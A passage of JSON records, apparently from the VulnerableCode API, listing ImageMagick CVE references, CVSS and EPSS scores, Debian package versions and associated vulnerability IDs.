"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730575", "reference_id": "1730575", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730575" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13301" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qrqm-h5se-1kep" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49497?format=api", "vulnerability_id": "VCID-r1uc-e1w7-kyda", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-3213.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-3213.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-3213", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09701", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09753", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09655", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09727", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09776", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09789", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09756", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09741", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09627", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09599", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09744", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.09788", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-3213" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3213", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3213" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021141", "reference_id": "1021141", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021141" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2126824", "reference_id": "2126824", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2126824" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-3213" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r1uc-e1w7-kyda" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79201?format=api", "vulnerability_id": "VCID-rqdx-1pdv-a3bu", "summary": "security update", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13304.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13304.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32485", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32639", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33148", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33182", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33012", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33056", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33086", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33089", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33051", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33027", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33068", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33046", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33017", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": 